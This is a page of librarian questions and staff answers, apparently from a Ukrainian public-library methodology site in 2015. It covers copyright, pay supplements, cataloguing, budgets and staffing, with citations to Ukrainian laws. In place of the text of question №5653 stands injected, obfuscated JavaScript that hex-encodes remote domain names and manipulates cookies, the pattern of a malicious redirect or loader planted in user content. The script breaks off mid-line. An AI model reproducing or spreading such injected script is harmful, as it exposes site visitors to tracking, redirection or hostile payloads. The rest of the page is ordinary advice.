Розділи сайту
Мастрід
Нове на сайті
Інформація від майстра
Відвідувачі
|
Запитання-відповіді
Питання №5752 |
Ksenia 28/10/2015 × 13:48 | 1. Местное частное издательство после устных договоренностей передало нам электронные версии выпущенных именно в этом издательстве книг местных авторов для размещения в открытом доступе на библиотечном сайте . Подскажите, пожалуйста, не будет ли это нарушением авторского права? Или все-таки правильно заключить письменный договор, и с кем - отдельно каждым автором или издательством в целом? 2. У нас бухгалтерия запретила оказывать любые платные услуги, ссылаясь на то, что местная налоговая не признает официальный перечень дополнительных услуг основным видом деятельности библиотеки и требует установления кассового аппарата (за год мы зарабатываем 2-3 тыс.грн). Правильно ли это?
Відповідь. 1. Звичайно, бажано укласти письмовий договір. Звертаємо увагу, що Договір має укладатися з тим суб’єктом, який володіє авторськими правами на конкретний твір. Тобто необхідно встановити кому належать авторські права - видавцю або авторам ?
2. Місцева податкова взагалі немає повноважень тлумачити законодавство. Основні засади бібліотечної справи закріплено ЗУ «Про бібліотеки і бібліотечну діяльність», а платні послуги, які можуть надаватися закладами культури, заснованими на державній та комунальній формі власності затверджені Постановою КМУ від 12 грудня 2011 р. N 1271/Режим доступу: http://zakon4.rada.gov.ua/laws/show/1271-2011-%D0%BF.
|
Питання №5751 |
Natalia 28/10/2015 × 10:50 | Коли у бібліотеці немає тех.працівника, а прибирає сам бібліотекар йому мають за це доплачувати?
Відповідь. Просимо уточнити: за яких обставини бібліотекар розпочав прибирання приміщень бібліотеки ? |
Питання №5743 |
Lar
27/10/2015 × 09:52 http://vollibr.org.ua/ | Доброго дня, шановні колеги!
Хочему отримати відповідь на таке питання: якщо на титульному листі не зазначено назви видавництва, а відомості про нього можна знайти на другій стороні титулки, або на останній сторінці книги, чи треба, в такому разі, назву видавництва брати в квадратні дужки?
Відповідь. Зворотній бік титульного аркуша та випускні дані книги – приписане джерело бібліографічної інформації для зони вихідних даних. Найменування видавництва у бібліографічному описі можна зазначати без квадратних дужок, якщо вони зазначені на одному з вищезгаданих джерел.
Розміщення вихідних відомостей в книжковому виданні приписує ДСТУ 4861:2007 «Видання. Вихідні відомості».
Для вихідних даних у ДСТУ 4861:2007 приписано:
- титульний аркуш книги, тобто лицьовий бік титульного аркуша (титульну сторінку) і зворот титульного аркуша (пп. 5.1.5 та 5.1.12.5);
- випускні дані книги (п. 5.1.12), які зазначаються на останній сторінці видання.
Л. Рогальчук, науково-бібліографічний відділ .
|
Питання №5730 |
Mariya
26/10/2015 × 14:28 | Доброго дня, шановні колеги! Поясніть, будь ласка, яка довідка вважається віртуальною? Дякую.
Відповідь. Відповідно до п. 4.7.21 ДСТУ 7448:2013 БІБЛІОТЕЧНО-ІНФОРМАЦІЙНА ДІЯЛЬНІСТЬ. Терміни та визначення понять: бібліотечна служба, яка надає довідки на разовий інформаційний запит (4.2.32) вірту¬ального користувача бібліотеки (4.1.6), що містять фактографічну і/чи бібліографічну інформацію (4.4.4.1), а також посилання на Інтернет-ресурси, або може скласти перелік джерел інформації (4.1.2) за конкретною темою.
Також, звертаємо увагу на УБЕ, яка представлена на сайті НПБУ в режимі он-лайн /Режим доступу: http://ube.nplu.org/AboutProject .
|
Питання №5729 |
Nadya
26/10/2015 × 14:20 | Добрий день. Чула таку інформацію, що на наступний рік, можливо, буде скасовано процес тендерних закупівель на літературу. Чи так це, і може вже щось відомо з цього приводу. Дуже потрібно для планування бюджетних коштів на наступний рік. Дякую.
Відповідь. Чутками не оперуємо. У Міністерстві економічного розвитку і торгівлі України працює Департамент регулювання державних закупівель, який визначає правову політику в цій сфері й координує роботу системи держзакупівель. У 2016 році Міністерство передбачає здійснити наступні зміни: розповсюдити електронні закупівлі на всі закупівлі; забезпечити зручний публічний доступ до інформації про держзакупівлі; підвищити рівень професіоналізації державних замовників. |
Питання №5728 |
olga
26/10/2015 × 13:25 | Шановні колеги,дякую за відповідь на запитання 5621.Ми вивчили розділ фонду велика вітчизняна війна,хотіли поміняти роздільники в каталозі та поличкові роздільники,де знайти нову формуліровку розділів,чи є які зміни до цього розділу?.
Відповідь. Пропонуємо опрацювати матеріали, підготовлені Українським інститутом національної пам'яті : інформаційно-довідковим виданням "Україна в другій світовій війні"/Режим доступу: http://www.memory.gov.ua/news/istoriki-stvorili-informatsiino-dovidkove-vidannya-ukraina-v-drugii-svitovii-viini ; Методичними матеріалами до відзначення Дня пам’яті та примирення та 70-ї річниці Дня перемоги над нацизмом у Другій світовій війні (8-9 травня 2015 р.)/Режим доступу: http://www.memory.gov.ua/news/metodichni-materiali-do-vidznachennya-dnya-pam-yati-ta-primirennya-ta-70-i-richnitsi-dnya-perem . |
Питання №5698 |
Valentina 23/10/2015 × 16:47 | В нас скоротили 2 місяці тому посаду бухгалтера. Колись після скорочення конкретної посади (напр. бібліографа) не дозволялося вводити таку ж посаду і приймати нову людину терміном 2 роки. З січня 2016 року нам районна влада збільшує мережу і буде потреба ввести знову цю посаду бухгалтера. Чи є десь записана така норма про тих 2 роки? Згідно законодавства неможливо буде запропонувати це місце скороченій людині, тому що вона була глибоко пенсійного віку і не володіла досконало комп'ютером і бух.програмами.
Відповідь. Вищезазначена норма в законодавстві відсутня. В той же час, Типовим положенням про бухгалтерську службу бюджетної установи(затверджено постановою Кабінету Міністрів України від 26 січня 2011 р. N 59, із змінами /Режим доступу: http://zakon3.rada.gov.ua/laws/show/59-2011-%D0%BF ) передбачено, що бухгалтерська служба відповідно до покладених на неї завдань має вести бухгалтерський облік з використанням уніфікованої автоматизованої системи бухгалтерського обліку та звітності. |
Питання №5697 |
Anna 23/10/2015 × 13:40 | Який місяць вважати базовим та як проводити нарахування індексації на новому місці роботи? Працівник бібліотеки Лашко Е.М., який отримував заробітну плату у сільській раді, з 02 березня 2015 року був переведений згідно Бюджетного кодексу України ст.89 у відділ культури. Згідно наданої довідки з попереднього місця роботи базовий місяць для нарахування індексації встановлений квітень 2013 р., фіксована індексація складала 272,62 грн. З 2013 р. індексація на попередньому місці роботи не нараховувалась та не виплачувалась. Як проводити нарахування та виплату індексації у відділі культури? Який місяць для нарахування індексації рахувати базовим: квітень 2013 року чи березень 2015 року? Аналогічно, Стоволос Н.А. переведена в відділ культури з 02.03.2015 р. Згідно наданої довідки базовий місяць встановлено січень 2013 р., фіксована індексація склала 272,02 грн. Індексація нараховувалась та виплачувалась включно до 31.12.2014 р. А з січня 2015 р. по березень 2015 р. нарахування та виплата індексації на попередньому місці роботи їй не проводилась та не виплачувалась. Який місяць рахувати базовим: квітень 2013 року чи березень 2015 року?
Відповідь. Професійну відповідь Ви маєте отримати від бухгалтерської служби. Питання здійснення нарахування заробітних плат працівникам, контроль за витрачанням фонду оплати праці поза межами функціональних обов’язків працівників НМВ НПБУ. |
Питання №5696 |
Planirovanie 23/10/2015 × 12:44 | Доброго дня! Коли з’явиться на сайті «Календар знаменних і пам’ятних дат – 2016 рік»?
Відповідь. Шановні колеги! Національна парламентська бібліотека України видає календар знаменних дат, який має назву «Дати і події» і розповсюджується за передплатою, індекс 68555. Розділ сайту НПБУ «Календар знаменних і пам’ятних дат» вже має інформацію про дати 2016-го року.
|
Питання №5695 |
nata 23/10/2015 × 09:34 | Может ли руководитель библиотеки и начальники отделов подписать контракт с иностранной фирмой на выполнение работ по мониторингу проекта в библиотеке в свободное от основной работы время?
Відповідь. Можуть, законодавство це не забороняє. В той же час, зверніть увагу на те, як само вищезазначені умови прописані в контракті? |
Питання №5694 |
rayonna_biblioteka
22/10/2015 × 13:52 | Доброго дня! Прошу надати відповідь на таке питання. В 2016 році заклади культури мають бути передані на фінансування з районного бюджету, для чого буде створено комунальний заклад "Централізована бухгалтерія". Хто має приняти на баланс майно, фонди з бюджетів сільських рад? ЦБС ліквідована, районна бібліотека - самостійна юридична особа і розпорядник коштів, засновник - районна рада, в Статуті не передбачено, що майно сільських бібліотек знаходиться на балансі районної бібліотеки.
Відповідь. Бюджетний кодекс передбачає два варіанти фінансування вищезазначених бібліотек: 1) з районного бюджету; 2) з бюджету села, селища, міста районного значення за рахунок міжбюджетних трансфертів з районного бюджету.
Якщо обрано перший варіант фінансування, потрібно обов’язково здійснити передачу закладу як юридичної особи з комунальної власності до спільної власності територіальних громад району. При цьому передбачається обов’язкова передача права власності на цілісний майновий комплекс закладу. Він може лишитися у комунальній власності і використовуватися закладом районної ради на підставі договору оренди або позички. Таким чином, пропозиції районної/обласної ради про передачу цілісних майнових комплексів таких закладів у спільну власність територіальних громад району/області мають бути розглянуті сільською, селищною, міською радою, виходячи з інтересів територіальної громади села, селища, міста районного значення, як окреме питання. Тільки сільська, селищна, міська рада може прийняти рішення про передачу права власності по своїм закладам.
Якщо обрано другий варіант фінансування, то обсяг міжбюджетних трансфертів має бути визначено за «формулою, яка затверджується відповідною місцевою радою (у додатку до рішення про місцевий бюджет)». Створюється комісія при районній раді за участі представників сільських, селищних, міських рад, які отримуватимуть трансферти. Головним завданням цієї комісії має бути визначення відповідної формули та обсягу міжбюджетних трансфертів з районного бюджету до бюджетів місцевого самоврядування.
В той же час, районна рада не може передбачити обсяг трансферту менший за потребу на утримання цих закладів та вимагати від сільської, селищної, міської ради дофінансувати їх з власних бюджетів, оскільки це буде порушенням частини другої ст. 85 Бюджетного кодексу.
15 січня 2015 року Парламент ухвалив зміни до Бюджетного кодексу (№1766 від 15.01.2015), якими передбачено, що за рахунок трансфертів з районних бюджетів можуть фінансуватись установи соціально-культурної сфери.
|
Питання №5693 |
Larisa
22/10/2015 × 12:37 | Скільки років потрібно пропрацювати бібліотекарю, щоб пройти першу атестацію?
Відповідь. Більше 1 року. Категорії працівників,які підлягають атестації, та періодичність її проведення визначаються колективним договором (див. п.1, п.2 ПОЛОЖЕННЯ про проведення атестації працівників підприємств, установ, організацій та закладів галузі культури (затверджено Наказом МКТ України від 16.07.2007 N 44 (із змінами) /Режим доступу: http://zakon3.rada.gov.ua/laws/show/z1023-07 ). |
Питання №5692 |
Maryna
21/10/2015 × 13:42 | Добрий день, шановні колеги! Підкажіть будь-ласка, чи потрібна в акті на списання літератури колонка "Причини списання", дякую.
Відповідь. Згідно форми АКТу про списання з балансу бюджетних установ і організацій вилученої з бібліотеки літератури (відповідно Типової форми № ОЗ-5 (бюджет)) причина списання вказується в шапці акта. Навіщо дублювати і вводити зайву колонку в опис літератури, яка підлягає списанню і вилученню з обліку? |
Питання №5691 |
oksana
21/10/2015 × 09:01 | Скажіть будь ласка, як правильно оцінювати літературу попередніх років видання (80-90-ті рр.), яка сьогодні надходить до фондів бібліотеки?
Відповідь. НАЦІОНАЛЬНЕ ПОЛОЖЕННЯ (СТАНДАРТ)бухгалтерського обліку в державному секторі 123 "Запаси" (затверджено Наказом Міністерства фінансів України від 12.10.2010 № 1202, із змінами /Режим доступу: http://zakon2.rada.gov.ua/laws/show/z1019-10 ) визначає: Первісною вартістю запасів, отриманих безоплатно від фізичних та юридичних осіб, визнається їх справедлива вартість на дату отримання з урахуванням витрат, передбачених пунктом 8 цього розділу. У разі якщо відсутня достовірна інформація щодо первісної вартості запасів, первісна вартість визначається на рівні справедливої вартості на дату отримання. Технологія визначення справедливої вартості прописана в МІЖНАРОДНОМУ СТАНДАРТІ ФІНАНСОВОЇ ЗВІТНОСТІ від 13 від 01.01.2013 /Режим доступу: http://zakon3.rada.gov.ua/laws/show/929_068/page (див. розділ Б2).
Також, нематеріальні активи, отримані безоплатно у вигляді безповоротної допомоги, дарунка, приймаються комісією, створеною наказом керівника, до складу якої обов'язково входить працівник бухгалтерської служби. Визначення справедливої вартості це професійні обов’язки працівника бухгалтерії.
P.S. Пропонуємо зважено ставитись до надходжень «ретровидань» (80-90-ті рр.).
|
Питання №5690 |
nata
20/10/2015 × 17:04 | Чи можуть сільські бібліотеки бути бібліотеками-філіями районної бібліотеки. Цбс реорганізовано три роки назад
Відповідь. Можуть, якщо відбудеться процес централізації. На даному етапі вищезазначені бібліотеки мають різних власників і фінансуються із різних бюджетів (РБ – з районного, сільські самостійні бібліотеки – із сільського бюджету). |
Питання №5689 |
Tamara 19/10/2015 × 12:46 | Доброго дня, шановні колеги! Скажіть, будь - ласка, в які терміни необхідно оновляти регламентуючі документи шкільної бібліотеки: 1. Паспорт бібліотеки. 2. Положення про бібліотеку школи №... 3.Правила користування бібліотекою школи №... 4. Інструкцію з охорони праці для бібліотекаря. 5.Інструкцію з правил поведінки учнів у бібліотеці. 6. Посадові інструкції бібліотекаря, завідуючої бібліотеки. Щиро дякую!
Відповідь. Вищезазначені документи розробляються і затверджуються в відповідності до діючих нормативно-правових актів (Законів, Постанов, Інструкцій, Наказів і т.п.). Мають бути підстави для внесення змін (оновлення) регламентуючих документів установи. Наприклад, нові ПРАВИЛА охорони праці для працівників бібліотек були оновлені відповідно до Наказу Міністерства надзвичайних ситуацій України від 12.12.2012 № 1398 /Режим доступу: http://zakon3.rada.gov.ua/laws/show/z0041-13 ).
До посадових інструкцій може бути внесено зміни і доповнення лише на підставі наказу керівника підприємства, установи, організації за згодою працівника. Наказ про внесення змін і доповнень до посадової інструкції видається і в разі перерозподілу обов'язків між працівниками у зв'язку зі скороченням чисельності, раціональним розподілом праці. У разі зміни назви підприємства, структурного підрозділу або посади до посадових інструкцій також вносять відповідні зміни.
|
Питання №5688 |
Elena 16/10/2015 × 21:07 19/10/2015 × 11:43 | Добрий день! В штатний розпис бібліотеки ВНЗ ввели посаду адміністратора системи. Скажіть будь-ласка який тарифний розряд має бути на цій посаді?
Відповідь. Тарифний розряд Ви маєте визначити за допомогою Додатка 3, Таблиці 2 до наказу МКТ України від 18.10.2005 N 745 /Режим доступу: http://zakon2.rada.gov.ua/laws/show/z1285-05/page3 . Вищезазначена посада вимагає від працівника диплом про повну вищу освіту, що відповідає рівню спеціаліста, магістра.
Звертаємо увагу, що доплата за вислугу років і надбавка за особливі умови роботи не надаються (посада відсутня в Переліку посад працівників державних і комунальних бібліотек, які провадять культурну, освітню, інформаційну, науково-дослідну, методичну, діяльність (затверджено постановою Кабінету Міністрів України від 22 січня 2005 р. N 84/ Режим доступу: http://zakon4.rada.gov.ua/laws/show/84-2005-п ). Адміністратор бази даних має право на виплату допомоги на оздоровлення під час щорічної відпустки у розмірі посадового окладу (ставки заробітної плати), якщо це прописано в Колективному договорі і передбачено фондом оплати праці на поточний рік.
Також, пропонуємо скористатись довідковим виданням «Інформатизація бібліотек», представлене на сайті в розділі Матеріали, лінк – Довідкові видання /Режим доступу: http://profy.nplu.org/file/500-library-inform.pdf .
|
Питання №5661 |
maria
16/10/2015 × 10:26 | Шановні колеги, маючи унікальний фонд стародруків та рукописних книг хочемо створити Музей рукописів та стародруків. Просимо надати рекомендацію щодо інструкції створення Положення про музей книги при бібліотеці вузу. Щиро дякуємо за неодноразову допомогу!
Відповідь. Національна парламентська бібліотека України не має у своїй структурі музею книги.
Радимо звернутися до колег з Харківської державної наукової бібліотеки ім. В. Г. Короленка, Одеської національної наукової бібліотеки ім. М. Горького, а також до бібліотек Одеського національного університету ім. І. Мечникова й Харківського національного автодорожнього університету, де свого часу було відкрито Музеї книги.
Більш докладно інформацію щодо музеїв книги див.: Матеріали науково-практичної конференції, присвяченої 100-річчю відділу рідкісних видань і рукописів ХДНБ ім. В. Г. Короленка «Колекції пам'яток писемності та друку у бібліотечних фондах України: проблеми формування, збереження, розкриття». зокрема статтю Г. І. Ковальчук «Колекції стародруків і рідкісних видань у бібліотеках України: історія створення, проблеми обліку та інформаційного розкриття» (Х., 2003. – С. 6–22.).
З повагою, зав. Відділу рідкісних і цінних книг – Лазарєва О.В.
|
Питання №5659 |
Tamara
15/10/2015 × 14:36 http://shbiblio.at.ua/ | Доброго дня, шановні колеги. Допоможіть, будь ласка, зашифрувати за таблицями УДК наукові роботи за такими темами: 1. Розвиток патріотичної свідомості учнів при підготовці майбутніх дизайнерів. 2. Впровадження сучасних технік живопису в організації самостійної пошукової роботи учнів. 3. Використання регіональних особливостей української народної вишивки на уроках виробничого навчання з подальшим залученням учнів до дослідницько-пошукової роботи. Дякуємо за допомогу.
Відповідь. Ми вже неодноразово відповідали, що Національна парламентська бібліотека України застосовує ББК для класифікації документів. Тому якщо у Вашій практиці виникають ускладнення з визначенням шифрів УДК, радимо звертатися до електронних каталогів наукових бібліотек, наприклад, Львівської національної наукової бібліотеки ім. В. Стефаника (Режим доступу: http://aleph.lsl.lviv.ua:8991/F/?func=file&file_name=find-d), або до бібліотек вищих навчальних закладів, наприклад, Науково-технічної бібліотеки ім. Г. І. Денисенка НТУУ "КПІ" (Режим доступу: http://library.ntu-kpi.kiev.ua:8991/F/) або наукової бібліотеки Національного університету "Києво-Могилянська академія" (Режим доступу: http://www.library.ukma.kiev.ua/), які для наукової обробки документів застосовують УДК.
Звертаємо увагу і на те, що для організації та пошуку інформації, здійснення наукових досліджень, а також як демонстраційний матеріал для вивчення системи УДК, Книжковою палатою України розроблено скорочений варіант УДК українською мовою. Матеріал розміщено на веб-сайті УДКК: http://www.udcc.org/udcsummary/php/index.php?lang=uk&pr=Y. |
Питання №5658 |
Olena 15/10/2015 × 11:46 http://www.lib-krm.org | Шановні колеги! Чи плануєте Ви, як методичний цетр публічних бібліотек України, клопотати про змінення порядку оплати на передплату періодичних видань на 1-е півріччя 2016 року за новими вимогами? Якщо НІ, ми, міські бібліотеки, втратимо періодичні видання з січня по лютий місяці 2016 року. Передплата не можлива за новими вимогами, а Укрпошта не надає послуг без попередньої оплати!!! Сподіваємось на регулювання цієї проблеми. З повагою.
Відповідь. Міністерство культури України домоглося письмової згоди Міністерства фінансів на зміни до п.5 Постанови КМУ «Про здійснення попередньої оплати товарів, робіт і послуг, що закуповуються за бюджетні кошти» (від 23 квітня 2014 р. № 117). Очікуємо на позитивне рішення КМУ.
|
Питання №5657 |
Lyubov
15/10/2015 × 11:10 | Шановні колеги! Прошу допомогти зробити правильний бібліографічний опис статті, яка має друковану та електронну версії :
Алексієвич С. Червоні чоловічки : письменниця Світлана Алексієвич - про Росію, Україну, Путіна / розмовляв А. Дашчинський // День. - 2014. - 23 квіт. - С. 11. Те ж [Електронний ресурс]. – Режим доступу:http://www.day.kiev.ua/uk/article/kultura/chervoni-cholovichkiЩиро дякую.
Відповідь. При існуванні друкованої та електронної версії найчастіше складають опис друкованого джерела, а в примітках зазначають наявність електронної версії, наприклад:
Алексієвич С. Червоні чоловічки : письменниця Світлана Алексієвич – про Росію, Україну, Путіна / розмовляв А. Дашчинський // День. – 2014. – 23 квіт. – С. 11. – Відомості доступні також з Інтернету: http://www.day.kiev.ua/uk/article/kultura/chervoni-cholovichki.
Якщо все ж таки потрібно дати посилання саме на електронний варіант, то бібліографічний опис частини друкованого видання доповнюють інформацією про загальне позначення матеріалу [Електронний ресурс], а опис ідентифікувального документа – відомостями про режим доступу, дату звернення до електронної версії та джерело назви, наприклад:
Алексієвич С. Червоні чоловічки [Електронний ресурс] : письменниця Світлана Алексієвич – про Росію, Україну, Путіна / розмовляв А. Дашчинський // День. – 2014. – 23 квіт. – Режим доступу: http://www.day.kiev.ua/uk/article/kultura/chervoni-cholovichki (дата звернення 19.10.2015). – Назва з екрана.
Детальніше про опис електронних ресурсів:
Женченко М. Бібліографічний опис електронних ресурсів: загальні вимоги [Електронний ресурс] / Марина Женченко // Вісник Книжкової палати. – 2011. – № 4. – Режим доступу: http://nbuv.gov.ua/j-pdf/vkp_2011_4_5.pdf (дата звернення 19.10.2015). – Назва з екрана.
Науково-бібліографічний відділ
|
Питання №5655 |
Alisa 15/10/2015 × 09:27 | Чи бде в 2016 році муніципальна надбавка бібліотечним працівникам?
Відповідь. Джерела коштів на оплату праці для установ і організацій, що фінансуються з бюджету, - це кошти, які виділяються з відповідних бюджетів, а також частина доходу, одержаного внаслідок господарської діяльності та з інших джерел. Обсяги витрат на оплату праці працівників установ і організацій, що фінансуються з бюджету, затверджуються одночасно з бюджетом. Під час підготовки проекту кошторису на 2016 рік до нього складається розрахунок фонду заробітної плати, який включає основну і додаткову заробітну плату (грошова винагорода, надбавки, матеріальна допомога, премії тощо). Якщо надбавка буде передбачена фондом оплати праці в 2016 році , можете очікувати на її отримання. |
Питання №5654 |
Tata 15/10/2015 × 05:44 | Скажіть, будь-ласка, які дати для бібліотеки вважаються ювілейними? Дякую за відповідь.
Відповідь. Пропонуємо ознайомитись з Указом Президента України «Про впорядкування відзначення пам'ятних дат і ювілеїв» від 02.12.1995 № 1116/95 (із змінами) /Режим доступу: http://kadrovik01.com.ua/forum/156/14365/ .
|
Питання №5653 |
Oksana
13/10/2015 × 20:28 http://bibliotekadryziv.blogspot.com | window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="19792",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t < o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n> t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e |
Питання №5652 |
223355
12/10/2015 × 09:46 | щодо роботи бібліотеки закладу освіти |
Питання №5650 |
Татьяна 10/10/2015 × 12:37 | Добрый день! Прошу вашей помощи. Мой библиотечный стаж 21 год. Последние 3 года работаю заведующим библиотекой-филиалом Централизованной библиотечной системы коммунального учреждения культуры. Предыдущие 14 лет работала библиографом в высшем учебном заведении ІІІ-го уровня аккредитации. Имею ли я право на 30% надбавку за выслугу лет, или только 10%-ю за 7-летнию работу в библиотеках государственной или коммунальной собственнности. Представители КРУ утверждают, что работа в частном ВУЗе не входит в библиотечный стаж, при котором положена надбавка за выслугу лет. Накладывают штрафные санкции в размере 3-х месячной разницы, между 30% и 10%, на меня и на директора ЦБС. Спасибо.
Відповідь.Констатуємо, що працівники КРУ звернули увагу лише на п.1 Порядку виплати доплати за вислугу років, затвердженого Постановою КМУ «Про затвердження Порядку виплати доплати за вислугу років працівникам державних і комунальних бібліотек» від 22 січня 2005 р. N 84 (із змінами) /Режим доступу: http://zakon5.rada.gov.ua/laws/show/84-2005-%D0%BF : доплату за вислугу років здійснюють працівникам державних і комунальних бібліотек, АЛЕ залишили поза увагою п. 3 вищезазначеного Порядку, який зазначає: до стажу роботи, що дає право на встановлення доплати за вислугу років, зараховується: час роботи в бібліотеках України, колишнього Союзу РСР на зазначених у переліку посадах. Тобто, даний пункт визначає поняття БІБЛІОТЕКА і не виокремлює, що це має бути лише комунальна або державна бібліотека. У Вашому випадку Ви маєте право на доплату в розмірі 30 % до посадового окладу.
|
Питання №5649 |
Любовь 10/10/2015 × 10:08 | Просим вас ответить на вопрос, какими нормативными документами нужно руководствоваться при оказании платных услуг школьной библиотекой (ксерокопирование и распечатка с электронного носителя), и как правильно практически оформить оказание таких услуг? Заранее благодарна за ответ.
Відповідь. Публічні бібліотеки Україні надають платні послуги згідно умов, викладеними в Постанові Кабінету Міністрів України «Про затвердження переліку платних послуг, які можуть надаватися закладами культури,заснованими на державній та комунальній формі власності» від 12 грудня 2011 р. N 1271 /Режим доступу: http://zakon2.rada.gov.ua/laws/show/1271-2011-%D0%BF marlit@bk.ru . Враховуючи, що платні освітні та інші послуги у навчальних закладах здійснюється відповідно до «Порядку надання платних освітніх послуг державними та комунальними навчальними закладами» (затверджено Наказом МОН України, Міністерством економіки, Міністерством фінансів від 23.07.2010 N 736/902/758)/Режим доступу: http://zakon3.rada.gov.ua/laws/show/z1196-10 пропонуємо переадресувати запит до Державної науково-педагогічної бібліотеки України імені В. О. Сухомлинського, яка здійснює організацію науково-методичного забезпечення діяльності мережі освітянських бібліотек Міністерства освіти і науки України та Академії педагогічних наук України /Режим доступу: http://zakon3.rada.gov.ua/laws/show/z1196-10 . |
Питання №5648 |
Nata 09/10/2015 × 08:25 | Яка правильна назва Алфавітний каталог чи Абетковий
Відповідь. Правильні обидва варіанти. |
Питання №5647 |
lyudmila 08/10/2015 × 16:05 http://shbiblio.at.ua/ | Доброго дня! Скажіть ,будь ласка, де можна взнати тарифний розряд та ставку інженера комп'ютерних технологій центральної районної бібліотеки. Дякую.
Відповідь. Звертаємо увагу на СХЕМУ тарифних розрядів посад професіоналів, фахівців, керівників інших структурних підрозділів і технічних службовців, загальних для всіх бюджетних установ, закладів та організацій культури (Таблиця 2),затверджену наказом Міністерства культури і туризму України 18.10.2005 N 745 (із змінами) /Режим доступу: http://zakon5.rada.gov.ua/laws/show/z1285-05/page5 . |
Питання №5646 |
Oksana
08/10/2015 × 10:55 | Шановні колеги, доброго дня. Допоможіть будь-ласка. Які необхідно переглянути і опрацювати нормативно-правові документи, щоб знати чи міська ЦБС може іти по категорії. Дякуємо щиро за Вашу роботу.
Відповідь. Пропонуємо ознайомитись із ПОКАЗНИКАМИ для віднесення до груп за оплатою праці керівних працівників бібліотек та централізованих бібліотечних систем, представлених у Додатку 7 до наказу Міністерства культури і туризму України 18.10.2005 N 745 (із змінами) /Режим доступу: http://zakon5.rada.gov.ua/laws/show/z1285-05/page5 . |
Питання №5645 |
Oksana 06/10/2015 × 07:18 | Відповідь. Особа, якій призначено пенсію за вислугу років не має права працювати на посадах у закладах і установах, зазначених у всіх розділах Переліку закладів і установ освіти, охорони здоров’я та соціального захисту і посад, робота на яких дає право на пенсію за вислугу років (розділ 1 “Освіта”, розділ 2 “Охорона здоров’я” та розділ 3 “Соціальний захист”). Щодо роботи на посаді бібліотекаря, то Переліком передбачено посади завідуючої та бібліотекаря бібліотеки як закладу освіти (із статусом юридичної особи). Водночас це не поширюється на шкільні бібліотеки, які є структурним підрозділом навчального закладу, а отже не мають статусу юридичної особи, тому в цих закладах можна працювати бібліотекарем й одержувати пенсію за вислугу років.
У разі працевлаштування пенсіонер протягом 10 днів повинен надати відповідну довідку до територіального Управління Пенсійного фонду.
|
Питання №5644 |
olga
05/10/2015 × 13:19 | Доброго дня, шановні колеги! Підкажіть, будь ласка, чому Іван Бунін вважається українським письменником (за календарем знаменних дат 2010 року Національної парламентської бібліотеки України)? Дякую.
Відповідь. Шановні колеги! Від 2013 р. календар знаменних дат Національної парламентської бібліотеки України має назву «Дати і події», виходить двічі на рік, передплатний індекс 68555.
Стосовно дефініції до 140-річчя з дня народження Івана Олексійовича Буніна (Календар знаменних і пам’ятних дат, 2010, №4, С. 9) там дослівно зазначено не просто українського, а «українського та російського письменника, перекладача».
Зауважимо, що вже друге десятиліття серед укладачів біографічних бібліографічних ресурсів точаться дискусії щодо критеріїв відбору імен до українських видань.
В Інституті біографічних досліджень було запропоновано наступні критерії:
1. Діячі української історії, національно-визвольного, суспільно-політичного та культурно-освітнього рухів, регіональні та місцеві діячі, а також діячі з різних галузей освіти, науки, культури, релігійного життя, військової справи, державного будівництва та управління, економічного життя тощо – як етнічні українці, так і представники інших національностей.
2. Діячі української діаспори, участь яких в українських політичних, економічних, культурно-освітніх, наукових, релігійних організаціях, спілках і фондах зарубіжжя та їхній внесок в українську та світову культуру отримали визнання української і світової громадськості.
3. Діячі іноземного походження, які жили певний час в Україні, відігравали активну роль у суспільно-політичному, господарському та культурному житті українства або своєю активною діяльністю справили на нього помітний вплив, а також ті іноземці, хто був тісно пов'язаний з видатними діячами української історії й культури, займався дослідженням, популяризацією та підтримкою українства за кордоном.
Докладніше можна прочитати тут:
http://archive.nndiuvi.org.ua/fulltext.html?id=430
і безпосередньо про діячів іноземного походження, зокрема І. Буніна тут:
http://www.irbis-nbuv.gov.ua/cgi-bin/irbis_nbuv/cgiirbis_64.exe?I21DBN=LINK&P21DBN=UJRN&Z21ID=&S21REF=10&S21CNR=20&S21STN=1&S21FMT=ASP_meta&C21COM=S&2_S21P03=FILA=&2_S21STR=ubi_1996_1_6
Оскільки І. Бунін подорожував Україною, жив в українських містах, в своїх творах описував українські природу, побут, національний колорит і характер українців, то, беззаперечно, він «займався дослідженням, популяризацією та підтримкою українства». Окремо варто відмітити переклади творів українських авторів, здійснені І. Буніним.
Л. Рогальчук, сектор підготовки календарів знаменних і пам’ятних дат науково-бібліографічного відділу
|
Питання №5643 |
Камалія 05/10/2015 × 11:30 | Добрий вечір. Працюю у бібліотеці. За завідування бібліотекою існує доплата до зарплатні чи ні?. І ще одне питання. Де можна знайти чи замовити таблиці ББК та УДК? Буду вдячна за відповідь
Відповідь. Пропонуємо ознайомитись із Постановою КМУ «Про підвищення заробітної плати працівникам бібліотек» (із змінами) від 30.09.2009 р.
№1073 /Режим доступу: http://zakon5.rada.gov.ua/laws/show/1073-2009-%D0%BF , Постановою КМУ "Про затвердження Порядку виплати доплати за вислугу років працівникам державних і комунальних бібліотек" від 22.05.2005 р. № 84 /Режим доступу: http://zakon3.rada.gov.ua/laws/show/84-2005-%D0%BF .
Для організації та пошуку інформації, здійснення наукових досліджень, а також як демонстраційний матеріал для вивчення системи УДК, Книжковою палатою України розроблено скорочений варіант УДК українською мовою. Матеріал розміщено на веб-сайті УДКК: http://www.udcc.org/udcsummary/php/index.php?lang=uk&pr=Y.
|
Питання №5642 |
lubov
05/10/2015 × 11:01 http://volod-library.at.ua | Шановні колеги! У зв'язку зі склавшимися обставинами виникла потреба закриття сільської бібліотеки. Як це зробити?
